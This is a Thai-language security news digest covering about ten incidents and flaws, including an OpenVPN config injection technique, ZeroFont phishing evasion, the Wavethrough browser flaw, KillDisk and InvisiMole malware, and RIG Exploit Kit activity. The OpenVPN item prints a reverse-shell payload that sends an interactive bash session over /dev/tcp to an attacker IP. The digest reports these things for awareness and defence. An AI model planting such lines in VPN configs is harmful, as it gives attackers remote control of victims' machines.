Jacob Baines วิศวกรด้านความปลอดภัยจาก Tenable ได้แสดงเทคนิคการโจมตีใหม่โดยอาศัยการแก้ไขไฟล์การตั้งค่าของ OpenVPN เพื่อสอดแทรกคำสั่งที่เป็นอันตรายลงไป โดยเมื่อไฟล์ดังกล่าวถูกรันโดย OpenVPN คำสั่งที่ถูกสอดแทรกลงไปก็จะสามารถรันในเครื่องของเหยื่อ ซึ่งอาจส่งผลให้เกิดการรันคำสั่งเป็นอันตรายขึ้นมาได้

ในตัวอย่างการโจมตีของ Jacob Baines สิ่งที่ผู้โจมตีจำเป็นต้องทำคือการเพิ่มบรรทัด "script-security 2" ลงในไฟล์ OVPN ก่อนจะเพิ่ม up "cmd" ตามด้วยคำสั่งที่จะรันในระบบของเหยื่อ คำสั่ง script-security 2 จะทำให้ OpenVPN รันโค้ดที่ผู้ใช้กำหนดได้เองซึ่งหมายถึงคำสั่งในบรรทัด up "cmd" ได้ ตัวอย่างของการแก้ไขมีรายละเอียด้านล่าง โดยเป็นการสร้างการเชื่อมต่อกลับไปยังระบบของผู้โจมตี เปิดช่องทางให้ผู้โจมตีทำการควบคุมได้

script-security 2
up “/bin/bash -c ‘/bin/bash -i > /dev/tcp/192.168.1.218/8181 0&1&’”

การโจมตีนี้สามารถถูกสังเกตได้หลายวิธีการ อาทิ การตรวจสอบที่ไฟล์ OVPN หรือการตรวจสอบจากหน้าต่างของ OpenVPN เมื่อมีการเชื่อมต่อซึ่งจะแสดงให้เห็นคำสั่งที่เป็นอันตรายที่ถูกรันอย่างชัดเจน

ที่มา : bleepingcomputer

เว็บไซต์สำหรับแลกเปลี่ยน cryptocurrency จากเกาหลีใต้ "Bithumb" ถูกแฮกเป็นครั้งที่สองในรอบปี โดยในครั้งนี้นั้นผู้โจมตีประสบความสำเร็จที่จะขโมยเงินกว่า 31.6 ล้านดอลลาร์สหรัฐฯ ออกจากระบบ

ในขณะนี้ Bithumb ยังไม่ได้มีประกาศอย่างเป็นทางการว่าการโจมตีนั้นเกิดขึ้นได้อย่างไร ผู้โจมตีมีวิธีการนำเงินออกจากระบบได้อย่างไรและมีสกุลเงินใดที่ได้รับผลกระทบบ้าง อย่างไรก็ตามมีผู้ใช้งานหลายรายที่ค้นพบว่าเงินในสกุล Ripple ของตัวเองนั้นหายไป

อย่างไรก็ตามอ้างอิงจากประกาศอย่างเป็นทางการของ Bithumb ทางเว็บไซต์ได้ทำการโยกข้อมูลทั้งหมดไปไว้ใน cold wallet แล้ว และจะทำการตรวจสอบและแก้ไขช่องโหว่ในระบบก่อนที่จะดำเนินการ refund เงินที่ถูกขโมยไปให้กับผู้ใช้งาน

ที่มา : cyberscoop

บริษัทด้าน Cloud Security "Avanan" ประกาศการค้นพบเทคนิคใหม่ "Zerofont" ซึ่งช่วยผู้โจมตีสามารถข้ามผ่านกระบวนการตรวจสอบอีเมลเมื่อส่งอีเมลที่เป็นอันตรายไปหาผู้ใช้งานได้

เทคนิค ZeroFont นั้นอาศัยหลักการของแทรก "ข้อความที่ถูกซ่อน" ลงไปในส่วนเนื้อหาของอีเมลที่เป็นอันตราย โดยข้อความที่ถูกซ่อนนี้จะใช้วิธีการซ่อนโดยการตั้งขนาดของตัวอักษรให้เป็น 0 ซึ่งเมื่อถูกตรวจสอบด้วยคอมพิวเตอร์แล้วอาจเห็นข้อความที่แตกต่างกันออกไปจากที่ผู้ใช้งานเห็น

ยังไม่มีการระบุว่าไมโครซอฟต์ได้รับทราบและแก้ไขปัญหานี้ไปแล้วหรือไม่ อย่างไรก็ตามผู้ใช้งานควรระมัดระวังและตรวจสอบที่มาของอีเมลทุกครั้งนอกเหนือจากการตรวจสอบเนื้อหาของอีเมลโดยทั่วไปเพื่อป้องกันการถูกโจมตีในลักษณะนี้

ที่มา : thehackernews

นักพัฒนาจากทีม Google Chrome "Jake Archibald" ค้นพบช่องโหว่ด้านความปลอดภัย "Wavethrough" ในเบราว์เซอร์รุ่นใหม่ๆ ซึ่งส่งผลให้เว็บไซต์ที่ถูกเปิดอยู่ในโปรแกรมเว็บเบราว์เซอร์เดียวกันในขณะนั้นสามารถเข้าถึงข้อมูลระหว่างกันได้

โดยปกตินั้นเมื่อผู้ใช้งานเข้าชมเว็บไซต์ เบราว์เซอร์จะไม่ได้รับอนุญาตให้เรียกดูข้อมูลของเว็บไซต์อื่นๆ ที่ไม่ได้มีที่มาจากเว็บไซต์ที่ผู้ใช้งานเข้าชมอยู่ อย่างไรก็ตามช่องโหว่ Wavethrough นั้นเกิดขึ้นในกรณีของการเรียกหาข้อมูลในลักษณะที่เป็นไฟล์เสียงหรือไฟล์วีดิโอ ที่สามารถถูกเรียกข้ามเว็บไซต์ได้อย่างไม่มีเงื่อนไข

การเรียกหาข้อมูลที่เป็นไฟล์เสียงหรือไฟล์วีดิโอสามารถถูกเรียกได้เป็นส่วนๆ ในกรณีที่ไฟล์อาจมีขนาดใหญ่ เมื่อส่วนย่อยๆ ถูกเรียกและถูกใช้งานจนเกือบครบ เบราว์เซอร์จะพยายามค้นหาชิ้นส่วนต่อไปของไฟล์เพื่อที่จะเรียกและนำมาใช้งานใหม่ อย่างไรก็ตามการเรียกหาข้อมูลแบบเป็นส่วนๆ นี้กลับไม่ได้ถูกครอบคลุมโดยมาตรฐานความปลอดภัยที่ดีพอ ทำให้เกิดการนำไปพัฒนาที่แตกต่างกันและเกิดเป็นช่องโหว่ขึ้นมาได้

Jake Archibald ค้นพบช่องโหว่ Wavethrough ใน Microsoft Edge และ Mozilla Firefox ซึ่งทำให้การเรียกส่วนของข้อมูลนั้นสามารถูกบังคับให้เป็นการเรียกข้ามขอบเขตที่ควรจะเป็น หรือเรียกข้ามเว็บไซต์ได้ โดย Jake ได้แสดงตัวอย่างการโจมตีซึ่งทำให้เขาสามารถดึงข้อมูลของเว็บไซต์ที่มีการล็อกอินค้างอยู่ในโปรแกรมเว็บเบราว์เซอร์ได้

Recommendation : ในขณะนี้ช่องโหว่ดังกล่าวซึ่งตรวจพบใน Microsoft Edge และ Mozilla Firefox ได้ถูกแพตช์แล้ว แนะนำให้ผู้ใช้งานดำเนินการอัปเดตโปรแกรมเว็บเบราว์เซอร์ให้เป็นเวอร์ชันล่าสุดเพื่อรับแพตช์ช่องโหว่โดยด่วน
Affected Platform : Microsoft Edge และ Mozilla Firefox

ที่มา : thehackernews

Banco de Chile ธนาคารที่ใหญ่ที่สุดในชิลีตกเป็นเป้าหมายในการโจมตีทางไซเบอร์เมื่อวันที่ 24 พฤษภาคมที่ผ่านมา โดยผู้โจมตีมีการใช้มัลแวร์ KillDisk ในการโจมตีระบบซึ่งเชื่อกันว่าเพื่ออำพรางปฏิบัติการในขโมยเงินออกจากระบบ SWIFT ของธนาคาร

มัลแวร์ KillDisk เป็นมัลแวร์ที่ถูกพัฒนาขึ้นเพื่อเขียนทับข้อมูลในส่วน Master Boot Record (MBR) ซึ่งส่งผลให้คอมพิวเตอร์ไม่สามารถใช้งานได้ โดย KillDisk เป็นที่รู้จักกันในวงกว้างเนื่องมันถูกนำมาใช้ในรูปแบบของมัลแวร์เรียกค่าไถ่ด้วย

อย่างไรก็ตามในกรณีของ Banco de Chile ทาง Trend Micro ซึ่งเป็นผู้ตรวจพบการแพร่กระจายของ KillDisk ในแถบละตินอเมริกากล่าวว่า KillDisk ที่ตรวจพบในครั้งนี้นั้นอาจเป็น KillDisk ในเวอร์ชันใหม่เนื่องจากไม่ได้มีการแสดงข้อความขู่เรียกค่าไถ่และอาจมีเป้าหมายเพียงอย่างเดียวในการทำให้ระบบคอมพิวเตอร์ไม่สามารถใช้งานได้

Trend Micro ได้ให้ข้อมูลเพิ่มเติมอีกด้วยว่า สายพันธุ์ของมัลแวร์ KillDisk สายพันธุ์ใหม่นี้มีความเชื่อมโยงกับกลุ่มแฮกเกอร์ซึ่งเคยพยายามขโมยเงินจากธนาคารเม็กซิกัน Bancomext กว่า 110 ล้านดอลลาร์สหรัฐฯ ด้วย

ล่าสุดในวันที่ 9 มิถุนายนที่ผ่านมา Banco de Chile ได้ออกมาประกาศอย่างเป็นทางการว่ากลุ่มผู้โจมตีได้ขโมยเงินออกไปจากระบบกว่า 10 ล้านดอลลาร์สหรัฐฯ ในช่วงที่ KillDisk แพร่กระจายในระบบจริง แต่ยังไม่มีการระบุว่ามีพฤติกรรมการโจมตีในลักษณะใดในตอนนี้

ที่มา : bleepingcomputer

ESET ประกาศการค้นพบมัลแวร์ลักลอบขโมยข้อมูล "InvisiMole" ซึ่งแพร่กระจายในรัสเซียและยูเครนวันนี้ โดยเชื่อกันว่าเป็นมัลแวร์ที่ถูกใช้ในการจารกรรมทางไซเบอร์เนื่องจากความซับซ้อนและความสามารถของมัลแวร์ที่หลากหลายและทำให้มัลแวร์ถูกตรวจจับได้ยาก

อ้างอิงจากรายงานของ ESET มัลแวร์ InvisiMole แพร่กระจายมาตั้งแต่ปี 2013 โดยมีเป้าหมายค่อนข้างจำกัดซึ่งทำให้ตรวจจับได้ยาก มัลแวร์รองรับการควบคุมจากกลุ่มผู้โจมตีเพื่อทำให้ทำตามคำสั่งที่ต้องการซึ่งรวมไปถึงแอบเปิดไมโครโฟนเพื่อดันเสียง แอบเปิดกล้องเว็บแคมเพื่อถ่ายรูป นอกเหนือจากนั้นยังแก้ไขการตั้งค่าของระบบได้อย่างอิสระ

ไม่มีการระบุถึงช่องทางในการแพร่กระจายของมัลแวร์ InvisiMole ในขณะนี้

ทาง ESET ยืนยันว่าในขณะนี้การแพร่กระจายของ InvisiMole ยังอยู่ในขอบเขตที่จำกัดมากๆ แต่ก็แนะนำให้ผู้ใช้งานหมั่นทำการอัปเดตระบบให้มีความทันสมัยอยู่เสมอ รวมไปถึงฐานข้อมูลเพื่อตรวจจับมัลแวร์ด้วย

ที่มา : bleepingcomputer

Cisco ประกาศแก้ไขช่องโหว่ที่เกี่ยวข้องกับบัญชีลับหรือ backdoor account เป็นครั้งที่สี่ในเดือนนี้หลังจากมีการตรวจพบถึงการมีอยู่ของรหัสผ่านในซอฟต์แวร์ Cisco Wide Area Application Services ซึ่งอาจทำให้ผู้โจมตีสามารถเข้าถึงการตั้งค่าของอุปกรณ์ได้

ช่องโหว่รหัส CVE-2018-0329 เกิดขึ้นหลังจากที่นักวิจัยด้านความปลอดภัย Aaron Blair จาก RIoT Solutions ไปค้นพบถึงการมีอยู่ของชุดสตริงนี้ซึ่งเป็น SNMP community string ในไฟล์ตั้งค่าของ SNMP daemon ซึ่งเขาเองยังพบอีกช่องโหว่หนึ่งรหัส CVE-2018-0352 โดยเป็นช่องโหว่ยกระดับสิทธิ์ใน Cisco WaaS ด้วย

ที่มา : bleepingcomputer

หลังจากที่ธนาคาร Bank of Montreal และ Simplii Financial ได้ประกาศการรั่วไหลของข้อมูลเมื่ออาทิตย์ที่ผ่านมา แฮกเกอร์ผู้ซึ่งอ้างว่าเป็นผู้โจมตีในครั้งนี้นั้นได้ออกมาขู่เรียกค่าไถ่กว่าเกือบ 1 ล้านเหรียญสหรัฐฯ ในสกุลเงิน Ripple เพื่อแลกกับการไม่เปิดเผยข้อมูลที่รั่วไหลออกมาของลูกค้ากว่า 100,000 คน

อีเมลที่ถูกส่งเพื่อเรียกค่าไถ่จากกลุ่มแฮกเกอร์ยังมีการเปิดเผยถึงวิธีการในเบื้องต้นที่ทำให้แฮกเกอร์สามารถเข้าถึงข้อมูลของบัญชีลูกค้าได้โดยอ้างว่า พวกเขาใช้อัลกอริธึมทางคณิตศาสตร์ทั่วไปในการสร้างเลขของบัญชีธนาคารที่เป็นเลขบัญชีจริง จากนั้นจึงใช้ข้อมูลดังกล่าวในการร้องขอให้ระบบล้างและตั้งค่ารหัสผ่านใหม่ได้

สำนักข่าว CBC News ออกมายืนยันการโจมตีนี้และยืนยันเพิ่มเติมว่าข้อมูลที่ผู้โจมตีใช้ในการกล่าวอ้างนั้นเป็นข้อมูลของลูกค้าซึ่งมีตัวตนจริง โดยทางธนาคารยังคงยืนยันที่จะไม่จ่ายค่าไถ่ให้กับแฮกเกอร์ โดยจะโฟกัสไปที่การปกป้องข้อมูลของผู้ใช้งานที่รั่วไหลออกต่อไป

ที่มา : BANK INFO SECURITY

ในช่วงปลายเดือนพฤกษาคมถึงต้นเดือนมิถุนายนที่ผ่านมา แอปเปิลได้มีการปล่อยแพตช์ด้านความปลอดภัยชุดใหญ่ซึ่งครอบคลุมหลายผลิตภัณฑ์ เฉพาะใน iOS 11.4 นั้น มีแพตช์ด้านความปลอดภัยกว่า 40 รายการ

สำหรับผลิตภัณฑ์ที่ได้รับการอัปเดตเวอร์ชันใหม่แถมแพตช์ด้านความปลอดภัยมีดังต่อไปนี้
- iTunes 12.7.5 for Windows
- watchOS 4.3.1
- iOS 11.4
- macOS High Sierra 10.13.5, Security Update 2018-003 Sierra, Security Update 2018-003 El Capitan
- Safari 11.1.1
- iCloud for Windows 7.5

โดยในรอบนี้นั้น WebKit ซึ่งเป็นเอนจินบนเว็บเบราว์เซอร์นั้นตกเป็นเป้าของการโจมตีและเป็นที่มาของหลายช่องโหว่ หนึ่งในนั้นคือช่องโหว่ CVE-2018-4233 ซึ่งถูกค้นพบโดย Samuel Groß (@5aelo) และถูกใช้งานในงาน Pwn2Own 2018 ที่ผ่านมา โดยทำให้เหยื่อถูกแฮกได้เพียงเป็นเปิดเว็บไซต์ที่มีโค้ดสำหรับโจมตีบนเครื่องที่มีช่องโหว่
Recommendation แนะนำให้ผู้ใช้งานทำการอัปเดตอุปกรณ์และซอฟต์แวร์ให้เป็นเวอร์ชันใหม่โดยด่วน

ที่มา : US-CERT

นักวิจัยภัยคุกคามอิสระ Kaffeine, นักวิจัยจาก Qihoo 360, Kaspersky, TrendMicro และ MalwareBytes ออกรายงานพฤติกรรมของเครือข่ายมัลแวร์ RIG Exploit Kit ล่าสุดที่มีการใช้ช่องโหว่รหัส CVE-2018-8174 ซึ่งเพิ่งถูกแพตช์เมื่อเดือนพฤษภาคมที่ผ่านมาเพื่อโจมตีระบบที่มีช่องโหว่และแพร่กระจายมัลแวร์ขุดบิทคอยน์

ช่องโหว่ CVE-2018-8174 เป็นช่องโหว่ในคอมโพเนนต์ VBScript ซึ่งถูกรวมอยู่ในโปรแกรมอย่าง Internet Explorer และ Microsoft Office ซึ่งทำให้ผู้โจมตีสามารถรันโค้ดที่เป็นอันตรายหรือมัลแวร์ในระบบของเหยื่อได้

เป็นที่เชื่อกันว่าพฤติกรรมของ RIG Exploit Kit เกิดขึ้นหลังจากมีการเปิดเผยโค้ดสำหรับพิสูจน์การมีอยู่ของช่องโหว่ (PoC) โดยนักวิจัยด้านความปลอดภัย Michael Gorelik จาก Morphisec ซึ่งทำให้มัลแวร์สามารถนำโค้ดดังกล่าวไปใช้ในการโจมตีและแพร่กระจายมัลแวร์ได้

แนะนำให้ผู้ใช้งานทำการอัปแพตช์ของระบบปฏิบัติการ Windows ให้เป็นรุ่นล่าสุดโดยด่วน

ที่มา: BLEEPINGCOMPUTER